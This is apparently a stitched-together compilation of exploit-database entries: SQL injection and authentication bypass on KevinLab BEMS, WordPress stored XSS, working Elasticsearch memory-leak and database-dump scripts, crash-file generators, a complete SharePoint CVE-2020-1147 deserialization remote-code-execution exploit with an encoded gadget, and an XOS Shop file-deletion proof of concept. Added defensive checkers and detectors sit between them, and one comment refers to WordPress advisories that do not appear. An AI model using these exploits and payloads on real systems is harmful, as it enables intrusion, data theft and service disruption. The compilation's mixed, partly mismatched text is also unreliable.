Summary: KevinLab is a venture company specialized in an IoT, Big Data and A.I. based energy management platform. KevinLAB's BEMS (Building Energy Management System) enables efficient energy management in buildings. It improves the efficiency of energy use by collecting and analyzing various information on energy usage and facilities in the building. It also manages energy usage, facility efficiency and indoor environment control.

Desc: The application suffers from an unauthenticated SQL Injection vulnerability. Input passed through the 'input_id' POST parameter in '/http/index.php' is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code and bypass the authentication mechanism.

Tested on: Linux CentOS 7
           Apache 2.4.6
           Python 2.7.5
           PHP 5.4.16
           MariaDB 5.5.68

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2021-5655
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5655.php

05.07.2021

--

PoC POST data payload (extract):
--------------------------------

POST /http/index.php HTTP/1.1
Host: 192.168.1.3

requester=login
request=login
params=[{"name":"input_id","value":"USERNAME' AND EXTRACTVALUE(1337,CONCAT(0x5C,0x5A534C,(SELECT (ELT(1337=1337,1))),0x5A534C)) AND 'joxy'='joxy"},{"name":"input_passwd","value":"PASSWORD"},{"name":"device_id","value":"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"},{"name":"checked","value":false},{"name":"login_key","value":""}]

PoC POST data payload (authbypass):
-----------------------------------

POST /http/index.php HTTP/1.1
Host: 192.168.1.3

requester=login
request=login
params=[{"name":"input_id","value":"USERNAME' or 1=1--"},{"name":"input_passwd","value":"PASSWORD"},{"name":"device_id","value":"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"},{"name":"checked","value":false},{"name":"login_key","value":""}]
-
WordPress Plugin Simple Post 1.1 - 'Text field' Stored Cross-Site Scripting (XSS)
# Exploit Title: WordPress Plugin Simple Post 1.1 - 'Text field' Stored Cross-Site Scripting (XSS)
# Date: 23/07/2021
# Exploit Author: Vikas Srivastava
# Software Link: https://wordpress.org/plugins/simple-post/
# Version: 1.1
# Category: Web Application
# Tested on: Mac

How to Reproduce this Vulnerability:

1. Install WordPress 5.7.2
2. Install and activate Simple Post
3. Navigate to Settings >> Simple Post and enter the XSS payload into the Text input field.
4. Click Update Options.
5. You will observe that the payload got stored in the database; when the same functionality is triggered again, the JavaScript payload executes and a pop-up appears.
6. Payload Used: "><script>alert(document.cookie)</script>
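The three WordPress advisories on this page (KN Fix Your Title, Mimetic Books and Simple Post) use the same attribute-context payload: the stored option is written back into value="..." on the settings page, and the leading "> closes the attribute and the tag so that the rest is parsed as markup. The following is an added example, not code from any of the three plugins: it renders a settings input the vulnerable way (raw value) and the fixed way (escaped as WordPress's esc_attr() would do it; html.escape(quote=True) applies the equivalent &quot;&lt;&gt;&amp; encoding) and then runs a real HTML parser over the result to see whether a <script> element actually appears. The input name "separator" is taken from the first advisory; the rest is constructed.

```python
"""Does a stored settings value break out of value="..."? (added example)"""
import html
from html.parser import HTMLParser

# Payload used by all three advisories above
PAYLOAD = '"><script>alert(document.cookie)</script>'


def render_input(name: str, stored_value: str, escape: bool) -> str:
    """Emit <input value="..."> the vulnerable way (raw) or the fixed way (attribute-escaped)."""
    value = html.escape(stored_value, quote=True) if escape else stored_value
    return '<input type="text" name="%s" value="%s" />' % (name, value)


class _ScriptFinder(HTMLParser):
    """Collects the body of every <script> element the parser encounters."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            self.scripts.append("")

    def handle_data(self, data):
        if self._in_script:
            self.scripts[-1] += data  # script content may arrive in several chunks

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False


def injected_scripts(page_html: str) -> list:
    """Bodies of the <script> elements a browser would execute in page_html."""
    p = _ScriptFinder()
    p.feed(page_html)
    p.close()
    return p.scripts


def is_stored_xss(name: str, stored_value: str, escape: bool) -> bool:
    """True if rendering the stored value produces a script element the author never wrote."""
    return len(injected_scripts(render_input(name, stored_value, escape))) > 0


if __name__ == "__main__":
    for escape in (False, True):
        print(render_input("separator", PAYLOAD, escape))
        print("  stored XSS:", is_stored_xss("separator", PAYLOAD, escape))
```

The check is the one to run against the real settings page after saving the payload: fetch the page HTML and pass it to injected_scripts(); a fixed plugin yields no script body, while the three above yield alert(document.cookie).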
-
ElasticSearch 7.13.3 - Memory disclosure
# Exploit Title: ElasticSearch 7.13.3 - Memory disclosure
# Date: 21/07/2021
# Exploit Author: r0ny
# Vendor Homepage: https://www.elastic.co/
# Software Link: https://github.com/elastic/elasticsearch
# Version: 7.10.0 to 7.13.3
# Tested on: Kali Linux
# CVE : CVE-2021-22145

#!/usr/bin/python3
from argparse import ArgumentParser
import requests
from packaging import version
import json
from requests.packages.urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

print("\n################################################################################################")
print("###### CVE-2021-22145 Memory leak vulnerability on Elasticsearch (7.10.0 to 7.13.3)       ######")
print("###### Exploit by r0ny (https://twitter.com/_r0ny)                                        ######")
print("################################################################################################\n")

parser = ArgumentParser()
parser.add_argument("-u", "--url", dest="url", help="URL of ElasticSearch service")
parser.add_argument("-apikey", "--api-key", dest="api_key", help="API Key Authentication (Base64)", metavar="API", default="")
parser.add_argument("-b", "--basic", dest="basic", help="Basic Authentication (Base64)", default="")
args = parser.parse_args()

if not (args.url):
    parser.error('Please input the elasticsearch url. e.g "python3 CVE-2021-22145.py -u http://127.0.0.1:9200"')

# Prepare authentication header
authorization_header = ""
if (args.api_key or args.basic):
    authorization_header = "ApiKey " + args.api_key if args.api_key else "Basic " + args.basic

# Check elasticsearch version
r = requests.get(args.url, headers={"Authorization": authorization_header}, verify=False)
try:
    es_version = json.loads(r.content)["version"]["number"]
except:
    print("# Couldn't connect to " + args.url + ", please verify the url or the authentication token\n")
    print("# Server response: " + str(r.content))
    exit()

if version.parse(es_version) < version.parse("7.10.0") or version.parse(es_version) > version.parse("7.13.3"):
    print("# Elastic Service not vulnerable")
    print("# Elastic Service version: " + es_version)
    print("# Elastic Service vulnerable versions: 7.10.0 to 7.13.3")
    exit()

# Prepare exploitation: a malformed _bulk body makes the JSON parser fail and
# echo its input buffer back in the error message
payload = "@\n"
vulnerable_endpoint = "/_bulk"
url = args.url + vulnerable_endpoint

# Exploitation
print("# ElasticSearch Version: " + es_version)
print("# Request to " + url + "\n")
r = requests.post(url, data=payload, headers={"content-type": "application/json", "Authorization": authorization_header}, verify=False)

# Read Memory Leak and remove stacktrace
print("$$$$$$$$$$$$$$$$$$$$$$$$$")
print("$$$$$ Memory Leaked $$$$$")
print("$$$$$$$$$$$$$$$$$$$$$$$$$\n")
response = json.loads(r.content)
leak1 = response["error"]["root_cause"][0]["reason"].split("(byte[])\"")[1].split("; line")[0]
leak2 = response["error"]["reason"].split("(byte[])\"")[1].split("; line")[0]
print(leak1 + "\n" + leak2)
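The exploit above recovers the leaked buffer by splitting the error "reason" on '(byte[])"' and '; line', which raises an IndexError against a patched node or any other error shape, and it depends on the third-party packaging module for the version gate. The following is an added example (not the exploit author's code) that does the same two things defensively: the version gate is a plain tuple comparison, and the fragment extraction is a regex over every reason string in the response that returns an empty list when nothing was leaked. The sample response is constructed here in the shape the exploit's string-splitting expects (Jackson's JsonParseException wording with a quoted source buffer); it is not captured from a real server.

```python
"""Parse the source-buffer excerpt that CVE-2021-22145 leaks via _bulk errors (added example)."""
import json
import re

VULNERABLE_MIN = (7, 10, 0)
VULNERABLE_MAX = (7, 13, 3)
# Jackson quotes the offending input as (byte[])"..." followed by "; line: N, column: M]"
_FRAGMENT = re.compile(r'\(byte\[\]\)"(.*?)"; line', re.S)


def version_tuple(s: str) -> tuple:
    """'7.13.3' -> (7, 13, 3); a '-SNAPSHOT' style suffix on a component is dropped."""
    return tuple(int(part.split("-")[0]) for part in s.split(".")[:3])


def is_vulnerable_version(s: str) -> bool:
    """True for the 7.10.0 .. 7.13.3 range given in the advisory header."""
    return VULNERABLE_MIN <= version_tuple(s) <= VULNERABLE_MAX


def leaked_fragments(body: str) -> list:
    """Every quoted source-buffer excerpt in the error response, deduplicated; [] if none."""
    try:
        doc = json.loads(body)
    except ValueError:
        return []
    if not isinstance(doc, dict) or not isinstance(doc.get("error"), dict):
        return []
    err = doc["error"]
    reasons = [err.get("reason", "")] + [c.get("reason", "") for c in err.get("root_cause", [])]
    found = []
    for reason in reasons:
        for frag in _FRAGMENT.findall(reason or ""):
            if frag not in found:
                found.append(frag)
    return found


# Constructed sample: the "@\n" we sent, followed by bytes from an earlier
# request that were still in the parser's buffer. Not a real capture.
_SAMPLE_REASON = (
    "Unexpected character ('@' (code 64)): expected a valid value "
    "(JSON String, Number, Array, Object or token 'null', 'true' or 'false')\n"
    ' at [Source: (byte[])"@\n{"index":{"_index":"customers"}}\n{"card":"4111 1111"}"; line: 1, column: 2]'
)
SAMPLE_RESPONSE = json.dumps({
    "error": {
        "root_cause": [{"type": "json_parse_exception", "reason": _SAMPLE_REASON}],
        "type": "json_parse_exception",
        "reason": _SAMPLE_REASON,
    },
    "status": 400,
})


if __name__ == "__main__":
    print(is_vulnerable_version("7.13.3"), is_vulnerable_version("7.14.0"))
    for frag in leaked_fragments(SAMPLE_RESPONSE):
        print(repr(frag))
    print(leaked_fragments('{"error":{"type":"illegal_argument_exception","reason":"no leak here"}}'))
```

Anything past the "@\n" you sent yourself is the interesting part; the exploit prints the root_cause and top-level reasons separately, which on a vulnerable node are usually the same excerpt, so the deduplication above keeps the output to one copy.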
-
NoteBurner 2.35 - Denial Of Service (DoS) (PoC)
# Exploit Title: NoteBurner 2.35 - Denial Of Service (DoS) (PoC)
# Date: 25.07.2021
# Vendor Homepage: https://www.noteburner.com/
# Software Link: https://anonfiles.com/13h9Hb82ub/noteburner_exe
# Exploit Author: Achilles
# Tested Version: 2.35
# Tested on: Windows 7 x64

# 1.- Run python code :
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open Noteburner
# 4.- Click More and Enter License Code
# 5.- Paste the content of EVIL.txt into the Field: 'Name' and 'Code'
# 6.- Click 'OK' and you will see a crash.

#!/usr/bin/env python
buffer = "\x41" * 6000
try:
    f = open("Evil.txt", "w")
    print("[+] Creating %s bytes evil payload.." % len(buffer))
    f.write(buffer)
    f.close()
    print("[+] File created!")
except IOError:
    print("File cannot be created")
-
Leawo Prof. Media 11.0.0.1 - Denial of Service (DoS) (PoC)
# Exploit Title: Leawo Prof. Media 11.0.0.1 - Denial of Service (DoS) (PoC)
# Date: 25.07.2021
# Vendor Homepage: https://www.leawo.org
# Software Link: https://www.leawo.org/downloads/total-media-converter-ultimate.html
# Exploit Author: Achilles
# Tested Version: 11.0.0.1
# Tested on: Windows 7 x64

# 1.- Run python code :
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open Leawo Prof. Media
# 4.- Click Activation Center
# 5.- Paste the content of EVIL.txt into the Field: 'Keycode'
# 6.- Click 'Register' and you will see a crash.

#!/usr/bin/env python
buffer = "\x41" * 6000
try:
    f = open("Evil.txt", "w")
    print("[+] Creating %s bytes evil payload.." % len(buffer))
    f.write(buffer)
    f.close()
    print("[+] File created!")
except IOError:
    print("File cannot be created")
-
Elasticsearch ECE 7.13.3 - Anonymous Database Dump
# Exploit Title: Elasticsearch ECE 7.13.3 - Anonymous Database Dump
# Date: 2021-07-21
# Exploit Author: Joan Martinez @magichk
# Vendor Homepage: https://www.elastic.co/
# Software Link: https://www.elastic.co/
# Version: >= 7.10.0 to <= 7.13.3
# Tested on: Elastic ECE (Cloud)
# CVE : CVE-2021-22146
# Reference: https://discuss.elastic.co/t/elastic-cloud-enterprise-security-update/279180

import os
import argparse
import sys


######### Check Arguments
def checkArgs():
    parser = argparse.ArgumentParser(description='Elasticdump 1.0\n')
    parser.add_argument('-s', "--host", action="store", dest='host', help="Host to attack.")
    parser.add_argument('-p', "--port", action="store", dest='port', help="Elastic search port by default 9200 or 9201")
    parser.add_argument('-i', "--index", action="store", dest='index', help="Number of _id values to request (Example: 30)")
    args = parser.parse_args()
    if len(sys.argv) == 1 or args.host is None or args.port is None:
        parser.print_help(sys.stderr)
        sys.exit(1)
    return args


def banner():
    print(r"      _           _   _          _")
    print(r"  ___| | __ _ ___| |_(_) ___ __| |_   _ _ __ ___  _ __")
    print(r" / _ \ |/ _` / __| __| |/ __/ _` | | | | '_ ` _ \| '_ \ ")
    print(r"|  __/ | (_| \__ \ |_| | (_| (_| | |_| | | | | | | |_) |")
    print(r" \___|_|\__,_|___/\__|_|\___\__,_|\__,_|_| |_| |_| .__/")
    print(r"                                                 |_|")


def exploit(host, port, index):
    # Without an explicit count, keep walking _id values indefinitely
    if index != 0:
        final = int(index)
    else:
        final = 1000000000
    cont = 0
    while cont <= final:
        # The index action is split across CRLF line breaks, which the vulnerable
        # _bulk parser handles differently from a well-formed NDJSON line
        os.system("curl -X POST \"" + host + ":" + port + "/_bulk\" -H 'Content-Type: application/x-ndjson' --data-binary $'{\x0d\x0a\"index\" : {\x0d\x0a \"_id\" :\"" + str(cont) + "\"\x0d\x0a}\x0d\x0a}\x0d\x0a' -k -s")
        cont = cont + 1


if __name__ == "__main__":
    banner()
    args = checkArgs()
    if args.index:
        exploit(args.host, args.port, args.index)
    else:
        exploit(args.host, args.port, 0)
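Both Elasticsearch PoCs above (CVE-2021-22145 against `_bulk` in the previous post, CVE-2021-22146 here) rely on the server accepting a `_bulk` body that is not the newline-delimited JSON the API documents: a stray `@` line in one case, an index action split across CRLF line breaks in the other. The following is an added example, not Elastic's code or either exploit author's, of the strict NDJSON check a reverse proxy or WAF in front of a cluster that cannot yet be upgraded could apply to request bodies. The three sample bodies are constructed (the two PoC payloads reproduced, plus a well-formed request for comparison); the real fix is upgrading past 7.13.3.

```python
import json

# Constructed sample bodies, not captured traffic: the one-byte body from the
# CVE-2021-22145 PoC, the CRLF-split action from the CVE-2021-22146 PoC, and a
# well-formed bulk request.
LEAK_BODY = "@\n"
CRLF_BODY = '{\r\n"index" : {\r\n "_id" :"0"\r\n}\r\n}\r\n'
BENIGN_BODY = '{"index":{"_index":"logs","_id":"1"}}\n{"msg":"hello"}\n'

# The only top-level keys a bulk action line may carry.
ACTIONS = {"index", "create", "update", "delete"}


def bulk_body_findings(body):
    """Return the reasons a _bulk body deviates from the NDJSON the API expects.

    An empty list means every line is a JSON object, every action line carries
    exactly one known action, and every non-delete action is followed by its
    source document.
    """
    findings = []
    if "\r" in body:
        findings.append("carriage return inside body; line splitting may differ between client and server")
    lines = body.split("\n")
    if lines and lines[-1] == "":
        lines.pop()                      # trailing newline is required, not a line
    expect_source = False
    for n, line in enumerate(lines, 1):
        try:
            obj = json.loads(line)
        except ValueError:
            findings.append("line %d is not JSON: %r" % (n, line[:40]))
            expect_source = False
            continue
        if not isinstance(obj, dict):
            findings.append("line %d is not a JSON object" % n)
            continue
        if expect_source:                # this line is the document for the previous action
            expect_source = False
            continue
        keys = set(obj)
        if len(keys) != 1 or not keys <= ACTIONS:
            findings.append("line %d is not a single bulk action: %s" % (n, sorted(keys)))
            continue
        expect_source = next(iter(keys)) != "delete"
    if expect_source:
        findings.append("last action is missing its source document line")
    return findings


if __name__ == "__main__":
    for name, body in (("leak", LEAK_BODY), ("crlf", CRLF_BODY), ("benign", BENIGN_BODY)):
        print(name, bulk_body_findings(body) or "ok")
```

A proxy applying this check should reject on any finding rather than try to repair the body; the point is that the origin never sees a line it will parse differently from the way the client framed it.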
-
Microsoft SharePoint Server 2019 - Remote Code Execution (2)
# Exploit Title: Microsoft SharePoint Server 2019 - Remote Code Execution (2)
# Google Dork: inurl:quicklinks.aspx
# Date: 2020-08-14
# Exploit Author: West Shepherd
# Vendor Homepage: https://www.microsoft.com
# Version: SharePoint Enterprise Server 2013 Service Pack 1, SharePoint Enterprise Server 2016, SharePoint Server 2010 Service Pack 2, SharePoint Server 2019
# Tested on: Windows 2016
# CVE : CVE-2020-1147
# Credit goes to Steven Seeley and Soroush Dalili
# Source: https://srcincite.io/blog/2020/07/20/sharepoint-and-pwn-remote-code-execution-against-sharepoint-server-abusing-dataset.html

#!/usr/bin/python
from sys import argv, exit, stdout, stderr
import argparse
import requests
from bs4 import BeautifulSoup
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from requests_ntlm import HttpNtlmAuth
from urllib import quote, unquote
import logging


class Exploit(object):
    # To generate the gadget use:
    # ysoserial.exe -g TypeConfuseDelegate -f LosFormatter -c "command"
    # ysoserial.exe -g TextFormattingRunProperties -f LosFormatter -c "command"
    gadget = '/wEypAcAAQAAAP////8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAADGBTw/eG1sIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9InV0Zi04Ij8+DQo8T2JqZWN0RGF0YVByb3ZpZGVyIE1ldGhvZE5hbWU9IlN0YXJ0IiBJc0luaXRpYWxMb2FkRW5hYmxlZD0iRmFsc2UiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmZ4LzIwMDYveGFtbC9wcmVzZW50YXRpb24iIHhtbG5zOnNkPSJjbHItbmFtZXNwYWNlOlN5c3RlbS5EaWFnbm9zdGljczthc3NlbWJseT1TeXN0ZW0iIHhtbG5zOng9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sIj4NCiAgPE9iamVjdERhdGFQcm92aWRlci5PYmplY3RJbnN0YW5jZT4NCiAgICA8c2Q6UHJvY2Vzcz4NCiAgICAgIDxzZDpQcm9jZXNzLlN0YXJ0SW5mbz4NCiAgICAgICAgPHNkOlByb2Nlc3NTdGFydEluZm8gQXJndW1lbnRzPSIvYyBwaW5nIC9uIDEwIDEwLjQ5LjExNy4yNTMiIFN0YW5kYXJkRXJyb3JFbmNvZGluZz0ie3g6TnVsbH0iIFN0YW5kYXJkT3V0cHV0RW5jb2Rpbmc9Int4Ok51bGx9IiBVc2VyTmFtZT0iIiBQYXNzd29yZD0ie3g6TnVsbH0iIERvbWFpbj0iIiBMb2FkVXNlclByb2ZpbGU9IkZhbHNlIiBGaWxlTmFtZT0iY21kIiAvPg0KICAgICAgPC9zZDpQcm9jZXNzLlN0YXJ0SW5mbz4NCiAgICA8L3NkOlByb2Nlc3M+DQogIDwvT2JqZWN0RGF0YVByb3ZpZGVyLk9iamVjdEluc3RhbmNlPg0KPC9PYmplY3REYXRhUHJvdmlkZXI+Cw=='

    control_path_quicklinks = '/_layouts/15/quicklinks.aspx'
    control_path_quicklinksdialogform = '/_layouts/15/quicklinksdialogform.aspx'
    control_path = control_path_quicklinks

    def __init__(self, redirect=False, proxy_address='', username='', domain='', password='', target=''):
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        self.username = '%s\\%s' % (domain, username)
        self.target = target
        self.password = password
        self.session = requests.session()
        self.redirect = redirect
        self.timeout = 0.5
        self.proxies = {
            'http': 'http://%s' % proxy_address,
            'https': 'http://%s' % proxy_address
        } if proxy_address is not None and proxy_address != '' else {}
        self.headers = {}
        self.query_params = {'Mode': "Suggestion"}
        self.form_values = {'__viewstate': '', '__SUGGESTIONSCACHE__': ''}
        self.cookies = {}
        # DataSet whose inline schema declares a column typed as ExpandedWrapper<LosFormatter, ObjectDataProvider>;
        # DataSet.ReadXml instantiates it and ObjectDataProvider calls LosFormatter.Deserialize on the gadget
        self.payload = """\
<DataSet>
  <xs:schema xmlns="" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" id="somedataset">
    <xs:element name="somedataset" msdata:IsDataSet="true" msdata:UseCurrentLocale="true">
      <xs:complexType>
        <xs:choice minOccurs="0" maxOccurs="unbounded">
          <xs:element name="Exp_x0020_Table">
            <xs:complexType>
              <xs:sequence>
                <xs:element name="pwn" msdata:DataType="System.Data.Services.Internal.ExpandedWrapper`2[[System.Web.UI.LosFormatter, System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" type="xs:anyType" minOccurs="0"/>
              </xs:sequence>
            </xs:complexType>
          </xs:element>
        </xs:choice>
      </xs:complexType>
    </xs:element>
  </xs:schema>
  <diffgr:diffgram xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" xmlns:diffgr="urn:schemas-microsoft-com:xml-diffgram-v1">
    <somedataset>
      <Exp_x0020_Table diffgr:id="Exp Table1" msdata:rowOrder="0" diffgr:hasChanges="inserted">
        <pwn xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
          <ExpandedElement/>
          <ProjectedProperty0>
            <MethodName>Deserialize</MethodName>
            <MethodParameters>
              <anyType xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xsi:type="xsd:string">{GADGET}</anyType>
            </MethodParameters>
            <ObjectInstance xsi:type="LosFormatter"></ObjectInstance>
          </ProjectedProperty0>
        </pwn>
      </Exp_x0020_Table>
    </somedataset>
  </diffgr:diffgram>
</DataSet>""".replace('{GADGET}', self.gadget)

    def do_get(self, url, params=None, data=None):
        return self.session.get(
            url=url,
            verify=False,
            allow_redirects=self.redirect,
            headers=self.headers,
            cookies=self.cookies,
            proxies=self.proxies,
            data=data,
            params=params,
            auth=HttpNtlmAuth(self.username, self.password)
        )

    def do_post(self, url, data=None, params=None):
        return self.session.post(
            url=url,
            data=data,
            verify=False,
            allow_redirects=self.redirect,
            headers=self.headers,
            cookies=self.cookies,
            proxies=self.proxies,
            params=params,
            auth=HttpNtlmAuth(self.username, self.password)
        )

    def parse_page(self, content):
        # Pull the current values of the tracked hidden inputs out of the form
        soup = BeautifulSoup(content, 'lxml')
        for key, val in self.form_values.iteritems():
            try:
                for tag in soup.select('input[name=%s]' % key):
                    try:
                        self.form_values[key] = tag['value']
                    except Exception as error:
                        stderr.write('error for key %s error %s\n' % (key, str(error)))
            except Exception as error:
                stderr.write('error for selector %s error %s\n' % (key, str(error)))
        return self

    def debug(self):
        try:
            import http.client as http_client
        except ImportError:
            import httplib as http_client
        http_client.HTTPConnection.debuglevel = 1
        logging.basicConfig()
        logging.getLogger().setLevel(logging.DEBUG)
        requests_log = logging.getLogger("requests.packages.urllib3")
        requests_log.setLevel(logging.DEBUG)
        requests_log.propagate = True
        return self

    def clean(self, payload):
        # Collapse the payload onto one line and squeeze runs of spaces
        payload = payload.replace('\n', '').replace('\r', '')
        while '  ' in payload:
            payload = payload.replace('  ', ' ')
        return payload

    def get_form(self):
        url = '%s%s' % (self.target, self.control_path)
        resp = self.do_get(url=url, params=self.query_params)
        self.parse_page(content=resp.content)
        return resp

    def send_payload(self):
        url = '%s%s' % (self.target, self.control_path)
        # self.get_form()
        self.headers['Content-Type'] = 'application/x-www-form-urlencoded'
        self.form_values['__SUGGESTIONSCACHE__'] = self.clean(self.payload)
        self.form_values['__viewstate'] = ''
        resp = self.do_post(url=url, params=self.query_params, data=self.form_values)
        return resp


if __name__ == '__main__':
    parser = argparse.ArgumentParser(add_help=True, description='CVE-2020-1147 SharePoint exploit')
    try:
        parser.add_argument("-target", action='store', help='Target address: http(s)://target.com ')
        parser.add_argument("-username", action='store', default='', help='Username to use: first.last')
        parser.add_argument("-domain", action='store', default='', help='User domain to use: domain.local')
        parser.add_argument("-password", action='store', default='', help='Password to use: Summer2020')
        parser.add_argument("-both", action='store', default=False, help='Try both pages (quicklinks.aspx and quicklinksdialogform.aspx): False')
        parser.add_argument("-debug", action='store', default=False, help='Enable debugging: False')
        parser.add_argument("-proxy", action='store', default='', help='Enable proxy: 10.10.10.10:8080')
        if len(argv) == 1:
            parser.print_help()
            exit(1)
        options = parser.parse_args()

        exp = Exploit(
            proxy_address=options.proxy,
            username=options.username,
            domain=options.domain,
            password=options.password,
            target=options.target
        )
        if options.debug:
            exp.debug()
        stdout.write('target %s username %s domain %s password %s debug %s proxy %s\n' % (
            options.target,
            options.username,
            options.domain,
            options.password,
            options.debug,
            options.proxy
        ))

        result = exp.send_payload()
        stdout.write('Response: %d\n' % result.status_code)
        if 'MicrosoftSharePointTeamServices' in result.headers:
            stdout.write('Version: %s\n' % result.headers['MicrosoftSharePointTeamServices'])

        if options.both and result.status_code != 200:
            exp.control_path = exp.control_path_quicklinksdialogform
            stdout.write('Trying alternate page\n')
            result = exp.send_payload()
            stdout.write('Response: %d\n' % result.status_code)

    except Exception as error:
        stderr.write('error in main %s' % str(error))
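The payload above smuggles the gadget in through an inline DataSet schema whose `msdata:DataType` attribute names `ExpandedWrapper`, `LosFormatter` and `ObjectDataProvider`; `DataSet.ReadXml` instantiates whatever type the schema declares. As an added example (not Microsoft's fix and not the exploit author's code), here is a Python check that a WAF, a log pipeline or an incident responder could run over captured `__SUGGESTIONSCACHE__` values to flag DataSet schemas that declare a column of such a type. The two XML documents are constructed: the malicious one copies the PoC's schema shape with a placeholder where the gadget would be, the benign one is an ordinary quick-links table.

```python
import xml.etree.ElementTree as ET

MSDATA = "urn:schemas-microsoft-com:xml-msdata"
XS = "http://www.w3.org/2001/XMLSchema"

# Type names that never belong in a client-supplied DataSet schema: each one is a
# known deserialization or object-instantiation gadget, not a data column type.
SUSPICIOUS_TYPES = (
    "System.Data.Services.Internal.ExpandedWrapper",
    "System.Windows.Data.ObjectDataProvider",
    "System.Web.UI.LosFormatter",
    "System.Windows.Markup.XamlReader",
)


def dataset_schema_findings(xml_text):
    """Return (column name, msdata:DataType) pairs from the inline schema of a
    DataSet XML document whose declared .NET type matches SUSPICIOUS_TYPES."""
    root = ET.fromstring(xml_text)
    findings = []
    for el in root.iter("{%s}element" % XS):
        dtype = el.get("{%s}DataType" % MSDATA)
        if dtype and any(t in dtype for t in SUSPICIOUS_TYPES):
            findings.append((el.get("name"), dtype))
    return findings


# Constructed sample: the PoC's schema shape, assembly details shortened and the
# gadget omitted, so only the type declaration remains.
MALICIOUS = """<DataSet>
<xs:schema xmlns="" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" id="somedataset">
 <xs:element name="somedataset" msdata:IsDataSet="true">
  <xs:complexType><xs:choice minOccurs="0" maxOccurs="unbounded">
   <xs:element name="Exp_x0020_Table"><xs:complexType><xs:sequence>
    <xs:element name="pwn" msdata:DataType="System.Data.Services.Internal.ExpandedWrapper`2[[System.Web.UI.LosFormatter, System.Web],[System.Windows.Data.ObjectDataProvider, PresentationFramework]], System.Data.Services" type="xs:anyType" minOccurs="0"/>
   </xs:sequence></xs:complexType></xs:element>
  </xs:choice></xs:complexType>
 </xs:element>
</xs:schema>
</DataSet>"""

# Constructed sample: a harmless two-column table of links.
BENIGN = """<DataSet>
<xs:schema xmlns="" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" id="links">
 <xs:element name="links" msdata:IsDataSet="true">
  <xs:complexType><xs:choice minOccurs="0" maxOccurs="unbounded">
   <xs:element name="Link"><xs:complexType><xs:sequence>
    <xs:element name="Url" type="xs:string" minOccurs="0"/>
    <xs:element name="Title" type="xs:string" minOccurs="0"/>
   </xs:sequence></xs:complexType></xs:element>
  </xs:choice></xs:complexType>
 </xs:element>
</xs:schema>
</DataSet>"""

if __name__ == "__main__":
    print("malicious:", dataset_schema_findings(MALICIOUS))
    print("benign:", dataset_schema_findings(BENIGN))
```

Matching on the type name rather than on the gadget bytes is deliberate: the gadget varies per command and per ysoserial formatter, while the `msdata:DataType` declaration is what every variant of this technique has to carry. Any `msdata:DataType` outside the primitive `System.*` value types is worth a look, so a stricter deployment would invert the list into an allow-list.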
-
XOS Shop 1.0.9 - 'Multiple' Arbitrary File Deletion (Authenticated)
# Exploit Title: XOS Shop 1.0.9 - 'Multiple' Arbitrary File Deletion (Authenticated)
# Date: 2021-07-25
# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)
# Vendor Homepage: https://xos-shop.com
# Software Link: https://github.com/XOS-Shop/xos_shop_system/releases/tag/v1.0.9
# Version: 1.0.9
# Tested on: Windows 10, XAMPP
# Reference: https://github.com/XOS-Shop/xos_shop_system/issues/1

################
# Description  #
################

# XOS-Shop is a further development of the well-known open source webshop system "osCommerce". XOS-Shop (tested on 1.0.9) suffers from an arbitrary file deletion vulnerability in the admin panel. Exploiting the vulnerability allows an authenticated attacker to delete any file in the web root, along with any other file on the server that the PHP process user has permission to delete. An attacker can also use the arbitrary deletion to disable web server security mechanisms, for example by deleting a .htaccess file that enforces them.

##########
# PoC 1  #
##########

Vulnerable URL: http://localhost/xos_shop_v1.0.9/shop/admin/manufacturers.php
Vulnerable Code: line 66 - xos_shop_v1.0.9\shop\admin\manufacturers.php

Steps to Reproduce:
1. Login as admin
2. Goto Catalog > Manufacturers > edit any manufacturer
3. Upload any image as "Manufacturers Image" and click save button
4. Then, tick "Delete" checkbox and click save button
5. Intercept the request and replace the existing image name with any file on the server via the parameter "current_manufacturer_image".

# Assumed there is a backup.conf file in the web root

